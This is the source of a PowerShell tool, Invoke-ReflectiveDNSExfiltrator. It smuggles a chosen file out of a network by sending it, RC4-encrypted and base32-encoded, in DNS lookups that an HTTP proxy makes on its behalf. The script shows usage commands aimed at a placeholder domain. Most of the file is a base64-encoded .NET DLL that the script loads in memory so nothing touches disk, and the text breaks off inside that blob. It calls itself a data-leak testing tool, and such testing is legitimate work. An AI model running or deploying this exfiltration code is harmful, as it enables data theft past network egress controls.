Invoke-ReflectiveDNSExfiltrator.ps1
function Invoke-ReflectiveDNSExfiltrator
{
<#
.AUTHOR Arno0x0x, Twitter: @Arno0x0x
.SYNOPSIS
Invoke-ReflectiveDNSExfiltrator transfers (exfiltrates) a file over a DNS resolution covert channel.
This is basically a data-leak testing tool that exfiltrates some data over a covert channel.
This tool addresses the specific case where the source computer from which you need/want to exfiltrate data cannot itself perform
DNS resolution of external domain names (which is normally required in order to use the DNS resolution covert channel).
The solution in this case is to use a third-party device exposing a service which has to resolve a domain name on behalf
of the source computer. The perfect, and most basic, example is an HTTP proxy server that is fed HEAD requests
for all the external domain names. It does not matter whether or not the HEAD request gets a proper HTTP response (we really don't care),
as long as the proxy first has to resolve the domain name, hence allowing for data exfiltration.
It requires the server-side counterpart written in Python: reflectiveDnsExfiltrator.py.
.EXAMPLE
# Default usage, no options:
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort
# Setting a 500ms throttling time
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort -t 500
# Limiting the DNS request size to a maximum of 150 bytes
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort -r 150
# Limiting the label size to a maximum of 40 characters
PS C:\> Invoke-ReflectiveDNSExfiltrator -i anyFile -d mydomain.com -p password -s proxyName:proxyPort -l 40
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[Alias('i')]
[ValidateNotNullOrEmpty()]
[String]$InputFile,
[Parameter(Mandatory = $True)]
[Alias('d')]
[ValidateNotNullOrEmpty()]
[String]$DomainName,
[Parameter(Mandatory = $True)]
[Alias('p')]
[ValidateNotNullOrEmpty()]
[String]$Password,
[Parameter(Mandatory = $True)]
[Alias('s')]
[ValidateNotNullOrEmpty()]
[String]$ProxyServer,
[Parameter(Mandatory = $False)]
[Alias('t')]
[ValidateNotNullOrEmpty()]
[int]$ThrottleTime,
[Parameter(Mandatory = $False)]
[Alias('r')]
[ValidateNotNullOrEmpty()]
[int]$RequestMaxSize,
[Parameter(Mandatory = $False)]
[Alias('l')]
[ValidateNotNullOrEmpty()]
[int]$LabelMaxSize
)
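# Load the DNSExfiltrator assembly.
# The Base64 string below decodes to a .NET DLL (it starts with "TVqQ", the Base64 form of the "MZ" PE header).
# It is passed as a byte array to [System.Reflection.Assembly]::Load, so the DLL is loaded from memory inside
# the PowerShell process and is never written to disk by this script.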
$DNSExfiltratorLib = [System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALQPVloAAAAAAAAAAOAAAiELAQsAACYAAAAGAAAAAAAA3kQAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIxEAABPAAAAAGAAAOgCAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA5CQAAAAgAAAAJgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAOgCAAAAYAAAAAQAAAAoAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAALAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADARAAAAAAAAEgAAAACAAUA3CoAALAZAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoCKAQAAAoAAAAqAAMwAgBvAAAAAAAAAAByAQAAcCgFAAAKAHIPAABwKAYAAApvBwAACigIAAAKAHLWAABwKAUAAAoAcjYBAHAoBQAACgByuwEAcCgFAAAKAHJiAgBwKAUAAAoAclUDAHAoBQAACgByAgQAcCgFAAAKAHLLBABwKAUAAAoAKgATMAIAaQAAAAEAABEAAnKyBQBwbwkAAAoW/gEKBi0MAB8MKAoAAAoAACs6AnK6BQBwbwkAAAoW/gEKBi0MAB8KKAoAAAoAACscAnLCBQBwbwkAAAoW/gEKBi0KAB8JKAoAAAoAAAIoBQAACgAfDygKAAAKACoAAAATMAMAGwAAAAIAABEAAigNAAAGcsoFAHByzgUAcG8LAAAKCisABioAEzAEABsAAAADAAARAAMXjQoAAAEKBhYffJ0GbwwAAAooBgAABgAqAAUAAAAGAAAABwAAABswBwAMBgAABAAAEQB+DQAACgp+DQAACgt+DQAACgx+DQAACg0gOAwAABMEfg0AAAoTBRYTBn4NAAAKEwd+DQAAChMIIP8AAAATCR8/EwoCjmka/gQW/gETIBEgLRcActAFAHAoAwAABgAoAgAABgA4oQUAAAIZmh86bw4AAAoV/gEW/gETIBEgLRcAcvwFAHAoAwAABgAoAgAABgA4dAUAAAIWmgoCF5oLAhiaDAIZmheNCgAAARMhESEWHzqdESFvDAAAChaaDQIZmheNCgAAARMhESEWHzqdESFvDAAACheaKA8AAAoTBAYoEAAAChMFBigRAAAKEyARIC0XAHI+BgBwBigSAAAKKAMAAAYAOAEFAAAZjQ4AAAEl0AUAAAQoFAAACgKOaSgBAAArFv4BEyARIDpMAQAAABoTCzgyAQAAAAIRC5pybgYAcG8JAAAKFv4BEyARIC1AAAIRC5oXjQoAAAETIREhFh89nREhbwwAAAoXmigPAAAKEwZydAYAcBEGjA4AAAEoEgAACigDAAAGAAA40wAAAAIRC5pywAYAcG8JAAAKFv4BEyARIC1VAAIRC5oXjQoAAAETIREhFh89nREhbwwAAAoXmigPAAAKEwwRDCD/AAAA/gQW/gETIBEgLQYAEQwTCQByxgYAcBEJjA4AAAEoEgAACigDAAAGAAA
rZwIRC5pyJgcAcG8JAAAKFv4BEyARIC1QAAIRC5oXjQoAAAETIREhFh89nREhbwwAAAoXmigPAAAKEwwRDB8//gQW/gETIBEgLQYAEQwTCgByLAcAcBEKjA4AAAEoEgAACigDAAAGAAARCxdYEwsAEQsCjmn+BBMgESA6vv7//wBygAcAcAYoEgAACigDAAAGAHMWAAAKEw0AEQ0XF3MXAAAKEw4AEQ4RBW8YAAAKEw8RD28ZAAAKExAREHMaAAAKExEAEREGKBsAAApvHAAACgAA3hQRERT+ARMgESAtCBERbx0AAAoA3ADeFBEQFP4BEyARIC0IERBvHQAACgDcAADeFBEOFP4BEyARIC0IEQ5vHQAACgDcABENFmoWbx4AAAomct4HAHAIKBIAAAooAwAABgAoHwAACghvIAAAChENbyEAAAooBwAABigEAAAGEwdynQgAcBEHbyIAAAqMDgAAASgSAAAKKAMAAAYAAN4UEQ0U/gETIBEgLQgRDW8dAAAKANwAEQkfClkHbyIAAAoYWFkTEhESEQoXWFsTExESEQoXWF0XWRMUERMRCloRFFgTFREHbyIAAAoRFVsXWBMWcgkJAHARFYwOAAABKBIAAAooAwAABgByoAkAcBEWjA4AAAEoEgAACigDAAAGABuNCAAAARMiESIWctgJAHCiESIXKB8AAApyEgoAcBEFERaMDgAAASgjAAAKbyAAAAooBAAABqIRIhhyIgoAcKIRIhkHohEiGnImCgBwohEiKCQAAAoTCCgfAAAKEQhvIAAAChMXAHIwCgBwKAMAAAYACREEcyUAAAoTGBEYbyYAAAoTGREZERcWEReOaW8nAAAKABEZERcWEReOaW8oAAAKExoRGW8pAAAKABEYbyoAAAoAAN4fExsAcmYKAHARG28rAAAKKBIAAAooAwAABgDdSwEAAABytgoAcCgDAAAGAH4NAAAKExwWEx0WEws4DgEAAAARBxELERURB28iAAAKEQtZKCwAAApvLQAAChMcERxvIgAAChMect4KAHASHSguAAAKciIKAHAoLwAAChMIFhMfKzEAEQgRHBEfEQpaEQoRHhEfEQpaWSgsAAAKby0AAApyIgoAcCgvAAAKEwgRHxdYEx8AER8RCloRHv4EEyARIC3AEQgHciYKAHAoLwAAChMIKB8AAAoRCG8gAAAKExc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CBgA4AU8ABgA6AU8AUCAAAAAAhhhpAAoAAQBcIAAAAACRAG8ADgABANggAAAAAJEAegASAAEAUCEAAAAAkQCFABcAAgB4IQAAAACGAIwAHQADAKwhAAAAAJYAlAAiAAQAECgAAAAAlgCZACgABQBEKAAAAACRAKEAMQAHAFgpAAAAAJEA2wA4AAgAnCkAAAAAkQDpAEcACgC4KQAAAACGGGkACgANADAoAAAAAJEATAXpAQ0AwCkAAAAAkwAUARcADgDUKgAAAACGGGkACgAPAMMoAAAAAIYYaQAKAA8AzCgAAAAAhgCxBT8CDwAAAAEAIwEAAAEAKAEAAAEALQEAAAEALQEAAAEAMgEAAAIAKAEAAAEAMgEAAAEAMgEAAAIAKAEAAAEANgEAAAIAOAEAAAMAOgEAAAEAOAEAAAEAPAEAAAEAxQUZAGkAoAAhAGkACgApAGkApQAJAGkACgAxAPQBEgA5AAgCsAA5ABoCtQAxAPQBuQBBADICvwAxAEoCxABBAF4CzgBBAGsC2ABBAHECXABBAHcC5ABZAIcC6QBhAJ4C7gBpAK8C8wBBALYC+AB5AGkACgCJAIYDBwGhALkDDwGpAGkACgCxAGkAIAGxABYEKQHJACIELwHRAGkANAFpADQEOgHRAEEEQAHZAFMECgC5AGYERgHpAIAETQHpAIkEUgGpAJIEWAFBAJoEXQFBALYCYQFBAKUEaAHxAGkAbgHxANcEdAG5AEEEeQG5AOEEgQG5AOYECgDxAOYECgABAfYEtQAJAQcFiQFBAAsFjwFxABU
FtQBBAKUElQERATYFnAGhAJIE0wGhAJEF+wEMAGkADQKhAJcFEwIUAGkADQIpAWkAoABBANUFWwIpAd8FYAIJABUFtQAIAAgAUgAIAAwAVwAOABAAXwAhAJsA/gAuAAsAdAIuABMAfQJDABsAqgCjAJsA/gDjAJsA/gCAAZsA/gABAAwAAAAGAMoA1ADfAKEB5AH3ATECUQJnAgUCRAKgIQAABQAEgAAAAAAAAAAAAAAAAAAAAACgAQAABAAAAAAAAAAAAAAAAQBSAAAAAAAEAAAAAAAAAAAAAAABAJYDAAAAAAQAAAAAAAAAAAAAAAEAzwMAAAAABAAAAAAAAAAAAAAAAQBbAAAAAAAGAAUABwADACsAHAFjAOABaQAsAmkATAIAAAAAADxNb2R1bGU+AHJlZmxlY3RpdmVEbnNFeGZpbHRyYXRvci5kbGwAUmVmbGVjdGl2ZURuc0V4ZmlsdHJhdG9yAFJDNEVuY3J5cHQAQmFzZTMyAG1zY29ybGliAFN5c3RlbQBPYmplY3QALmN0b3IAUHJpbnRVc2FnZQBQcmludENvbG9yAEVuY29kZQBHb0ZpZ2h0AE1haW4ARW5jcnlwdABFbmNyeXB0SW5pdGFsaXplAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAElFbnVtZXJhYmxlYDEARW5jcnlwdE91dHB1dABTd2FwAEluQnl0ZVNpemUAT3V0Qnl0ZVNpemUAQmFzZTMyQWxwaGFiZXQAVG9CYXNlMzJTdHJpbmcAdGV4dABkYXRhAGFyZ3MAa2V5AHMAaQBqAGJ5dGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQByZWZsZWN0aXZlRG5zRXhmaWx0cmF0b3IAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENvbVZpc2libGVBdHRyaWJ1dGUAQ29uc29sZQBXcml0ZUxpbmUAQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAGdldF9GcmllbmRseU5hbWUAU3RyaW5nAFN0YXJ0c1dpdGgAQ29uc29sZUNvbG9yAHNldF9Gb3JlZ3JvdW5kQ29sb3IAUmVwbGFjZQBDaGFyAFNwbGl0AEVtcHR5AEluZGV4T2YAQ29udmVydABUb0ludDMyAFN5c3RlbS5JTwBQYXRoAEdldEZpbGVOYW1lAEZpbGUARXhpc3RzAEZvcm1hdABJbnQzMgA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57RDZBODIxNjEtQkQ4Qy00QzZELUJEQUMtNjM5OTQyREU1REY5fQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5cGUAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT0xMgAkJG1ldGhvZDB4NjAwMDAwNi0xAFJ1bnRpbWVIZWxwZXJzAEFycmF5AFJ1bnRpbWVGaWVsZEhhbmRsZQBJbml0aWFsaXplQXJyYXkAU3lzdGVtLkNvcmUAU3lzdGVtLkxpbnEARW51bWVyYWJsZQBDb250YWlucwBNZW1vcnlTdHJlYW0AU3lzdGVtLklPLkNvbXByZXNzaW9uAFppcEFyY2hpdmUAU3RyZWFtAFppcEFyY2hpdmVNb2RlAFppcEFyY2hpdmVFbnRyeQBDcmVhdGVFbnRyeQBPcGVuAEJpbmFyeVdyaXRlcgBSZWFkQWxsQnl0ZXMAV3JpdGUASURpc3Bvc2FibGUARGlzcG9zZQBTZWVrT3JpZ2luAFNlZWsAU3lzdGVtLlRleHQARW5jb2RpbmcAZ2V0X1VURjgAR2V0Qnl0ZXMAVG9BcnJheQBnZXRfTGVuZ3RoAENvbmNhdABTeXN0ZW0uTmV
0LlNvY2tldHMAVGNwQ2xpZW50AE5ldHdvcmtTdHJlYW0AR2V0U3RyZWFtAFJlYWQAQ2xvc2UARXhjZXB0aW9uAGdldF9NZXNzYWdlAE1hdGgATWluAFN1YnN0cmluZwBUb1N0cmluZwBTeXN0ZW0uVGhyZWFkaW5nAFRocmVhZABTbGVlcABTb2NrZXRFeGNlcHRpb24APEVuY3J5cHRJbml0YWxpemU+Yl9fMABGdW5jYDIAQ1MkPD45X19DYWNoZWRBbm9ueW1vdXNNZXRob2REZWxlZ2F0ZTEAUmFuZ2UAU2VsZWN0ADw+Y19fRGlzcGxheUNsYXNzMwA8RW5jcnlwdE91dHB1dD5iX18yAGIAU3RyaW5nQnVpbGRlcgBnZXRfQ2hhcnMAQXBwZW5kAAAAAA1VAHMAYQBnAGUAOgAAgMV7ADAAfQAgADwAZgBpAGwAZQA+ACAAPABkAG8AbQBhAGkAbgBOAGEAbQBlAD4AIAA8AHAAYQBzAHMAdwBvAHIAZAA+ACAAPAB3AGUAYgBQAHIAbwB4AHkAPgAgAFsAdAA9AHQAaAByAG8AdAB0AGwAZQBUAGkAbQBlAF0AIABbAHIAPQByAGUAcQB1AGUAcwB0AE0AYQB4AFMAaQB6AGUAXQAgAFsAbAA9AGwAYQBiAGUAbABNAGEAeABTAGkAegBlAF0AAF8JAGYAaQBsAGUAOgAJAAkAWwBNAEEATgBEAEEAVABPAFIAWQBdACAAVABoAGUAIABmAGkAbABlACAAdABvACAAYgBlACAAZQB4AGYAaQBsAHQAcgBhAHQAZQBkAC4AAICDCQBkAG8AbQBhAGkAbgBOAGEAbQBlADoACQBbAE0AQQBOAEQAQQBUAE8AUgBZAF0AIABUAGgAZQAgAGQAbwBtAGEAaQBuACAAbgBhAG0AZQAgAHQAbwAgAHUAcwBlACAAZgBvAHIAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQAcwAuAACApQkAcABhAHMAcwB3AG8AcgBkADoACQBbAE0AQQBOAEQAQQBUAE8AUgBZAF0AIABQAGEAcwBzAHcAbwByAGQAIAB0AG8AIAB1AHMAZQBkACAAZgBvAHIAIABlAG4AYwByAHkAcAB0AGkAbgBnACAAdABoAGUAIABkAGEAdABhACAAdABvACAAYgBlACAAZQB4AGYAaQBsAHQAcgBhAHQAZQBkAC4AAIDxCQB3AGUAYgBQAHIAbwB4AHkAOgAJAFsATQBBAE4ARABBAFQATwBSAFkAXQAgAFQAaABlACAAcAByAG8AeAB5ACAAcwBlAHIAdgBlAHIAIAB0AG8AIAB1AHMAZQAgAGEAcwAgAGEAIAByAGUAZgBsAGUAYwB0AGkAdgBlACAARABOAFMAIAByAGUAcwBvAGwAdQB0AGkAbwBuACAAaABvAHMAdAAsACAAaQBuACAAdABoAGUAIABmAG8AcgBtACAAPABwAHIAbwB4AHkAQQBkAGQAZQBzAHMAOgBwAHIAbwB4AHkAUABvAHIAdAA+AC4AAICrCQB0AGgAcgBvAHQAdABsAGUAVABpAG0AZQA6AAkAWwBPAFAAVABJAE8ATgBOAEEATABdACAAVABoAGUAIAB0AGkAbQBlACAAaQBuACAAbQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAB0AG8AIAB3AGEAaQB0ACAAYgBlAHQAdwBlAGUAbgAgAGUAYQBjAGgAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQALgAAgMcJAHIAZQBxAHUAZQBzAHQATQBhAHgAUwBpAHoAZQA6AAkAWwBPAFAAVABJAE8ATgBOAEEATABdACAAVABoAGUAIABtAGEAeABpAG0AdQBtACAAcwBpAHoAZQAgAGkAbgAgAGIAeQB0AGUAcwAgAGYAbwByACAAZQBhAGMAaAAgAEQATgBTACAAcgBlAHEAdQBlAHMAdAAuACAARABlAGYAYQB1AGw
AdABzACAAdABvACAAMgA1ADUAIABiAHkAdABlAHMALgAAgOUJAGwAYQBiAGUAbABNAGEAeABTAGkAegBlADoACQBbAE8AUABUAEkATwBOAE4AQQBMAF0AIABUAGgAZQAgAG0AYQB4AGkAbQB1AG0AIABzAGkAegBlACAAaQBuACAAYwBoAGEAcgBzACAAZgBvAHIAIABlAGEAYwBoACAARABOAFMAIAByAGUAcQB1AGUAcwB0ACAAbABhAGIAZQBsACAAKABzAHUAYgBkAG8AbQBhAGkAbgApAC4AIABEAGUAZgBhAHUAbAB0AHMAIAB0AG8AIAA2ADMAIABjAGgAYQByAHMALgAAB1sAIQBdAAAHWwArAF0AAAdbACoAXQAAAz0AAAEAK1sAIQBdACAATQBpAHMAcwBpAG4AZwAgAGEAcgBnAHUAbQBlAG4AdABzAABBWwAhAF0AIABXAGUAYgAgAHAAcgBvAHgAeQAgAGEAcgBnAHUAbQBlAG4AdAAgAG0AYQBsAGYAbwByAG0AZQBkAAAvWwAhAF0AIABGAGkAbABlACAAbgBvAHQAIABmAG8AdQBuAGQAOgAgAHsAMAB9AAAFdAA9AABLWwAqAF0AIABTAGUAdAB0AGkAbgBnACAAdABoAHIAbwB0AHQAbABlACAAdABpAG0AZQAgAHQAbwAgAFsAewAwAH0AXQAgAG0AcwAABXIAPQAAX1sAKgBdACAAUwBlAHQAdABpAG4AZwAgAEQATgBTACAAcgBlAHEAdQBlAHMAdAAgAG0AYQB4ACAAcwBpAHoAZQAgAHQAbwAgAFsAewAwAH0AXQAgAGIAeQB0AGUAcwAABWwAPQAAU1sAKgBdACAAUwBlAHQAdABpAG4AZwAgAGwAYQBiAGUAbAAgAG0AYQB4ACAAcwBpAHoAZQAgAHQAbwAgAFsAewAwAH0AXQAgAGMAaABhAHIAcwAAXVsAKgBdACAAQwBvAG0AcAByAGUAcwBzAGkAbgBnACAAKABaAEkAUAApACAAdABoAGUAIABbAHsAMAB9AF0AIABmAGkAbABlACAAaQBuACAAbQBlAG0AbwByAHkAAIC9WwAqAF0AIABFAG4AYwByAHkAcAB0AGkAbgBnACAAdABoAGUAIABaAEkAUAAgAGYAaQBsAGUAIAB3AGkAdABoACAAcABhAHMAcwB3AG8AcgBkACAAWwB7ADAAfQBdACwAIAB0AGgAZQBuACAAYwBvAG4AdgBlAHIAdABpAG4AZwAgAGkAdAAgAHQAbwAgAGEAIABiAGEAcwBlADMAMgAgAHIAZQBwAHIAZQBzAGUAbgB0AGEAdABpAG8AbgAAa1sAKgBdACAAVABvAHQAYQBsACAAcwBpAHoAZQAgAG8AZgAgAGQAYQB0AGEAIAB0AG8AIABiAGUAIAB0AHIAYQBuAHMAbQBpAHQAdABlAGQAOgAgAFsAewAwAH0AXQAgAGIAeQB0AGUAcwAAgJVbACsAXQAgAE0AYQB4AGkAbQB1AG0AIABkAGEAdABhACAAZQB4AGYAaQBsAHQAcgBhAHQAZQBkACAAcABlAHIAIABEAE4AUwAgAHIAZQBxAHUAZQBzAHQAIAAoAGMAaAB1AG4AawAgAG0AYQB4ACAAcwBpAHoAZQApADoAIABbAHsAMAB9AF0AIABiAHkAdABlAHMAADdbACsAXQAgAE4AdQBtAGIAZQByACAAbwBmACAAYwBoAHUAbgBrAHMAOgAgAFsAewAwAH0AXQAAOUgARQBBAEQAIAAvACAASABUAFQAUAAvADEALgAwAA0ACgBIAG8AcwB0ADoAIABpAG4AaQB0AC4AAA97ADAAfQB8AHsAMQB9AAADLgAACQ0ACgANAAoAADVbACoAXQAgAFMAZQBuAGQAaQBuAGcAIAAnAGkAbgBpAHQAJwAgAHIAZQBxAHUAZQBzAHQAAU9bACEAXQAgAFUAbgBlAHgAcABlAGMAdABlAGQAIAB
lAHgAYwBlAHAAdABpAG8AbgAgAG8AYwBjAHUAcgBlAGQAOgAgAFsAewAwAH0AXQAAJ1sAKgBdACAAUwBlAG4AZABpAG4AZwAgAGQAYQB0AGEALgAuAC4AAC9IAEUAQQBEACAALwAgAEgAVABUAFAALwAxAC4AMAANAAoASABvAHMAdAA6ACAAABVbACoAXQAgAEQATwBOAEUAIAAhAABBQQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAE8AUABRAFIAUwBUAFUAVgBXAFgAWQBaADIAMwA0ADUANgA3AAAAAGEhqNaMvW1MvaxjmULeXfkACLd6XFYZNOCJAyAAAQMAAAEEAAEBDgUAAQ4dBQQgAQEOBQABAR0OCAACHQUdBR0FBgABHQUdBQ4AAhUSCQEFHQUVEgkBBQcAAwEdBQgIAgYIBAgAAAAEBQAAAAIGDkBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAMgAzADQANQA2ADcABCABAQgEIAEBAgUBAAEAAAQAABIdAyAADgUAAgEOHAQgAQIOBQABARElAwcBAgUgAg4ODgMHAQ4GIAEdDh0DBAcBHQMEIAEIAwQAAQgOBAABDg4EAAECDgUAAg4OHAQBAAAAAwYRGAcAAgESSRFNDBABAgIVEgkBHgAeAAMKAQgIIAMBEl0RYQIFIAESZQ4EIAASXQUgAQESXQUAAR0FDgUgAQEdBQYgAgoKEXEEAAASdQUgAR0FDgQgAB0FAyAACAYAAw4OHBwFAAEOHQ4FIAIBDggEIAASfQcgAwEdBQgIByADCB0FCAgFAAIICAgFIAIOCAgGAAMODg4OBAABAQgxByMODg4OCA4IDg4ICAgIElUSWRJlEl0SaQgICAgIHQUSeRJ9CBKAjQ4ICAgCHQMdDgwQAQEdHgAVEgkBHgADCgEFBAcBHQUEAAEFCAgGFRKAkQIIBQMHAQUJAAIVEgkBCAgIBxUSgJECCAUFIAIBHBgYEAICFRIJAR4BFRIJAR4AFRKAkQIeAB4BBAoCCAUJBwUdBQgIHQUCAwYdBQQgAQUFBxUSgJECBQUECgIFBQkHAhIcFRIJAQUEIAEDCAYgARKAlQMMBwgSgJUICAUICA4CCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAbREAAAAAAAAAAAAAM5EAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADARAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAACMAgAAAAAAAAAAAACMAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAA
AVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAE7AEAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAyAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADAALgAwAC4AMAAuADAAAABcAB0AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHIAZQBmAGwAZQBjAHQAaQB2AGUARABuAHMARQB4AGYAaQBsAHQAcgBhAHQAbwByAC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABkAB0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAcgBlAGYAbABlAGMAdABpAHYAZQBEAG4AcwBFAHgAZgBpAGwAdAByAGEAdABvAHIALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AM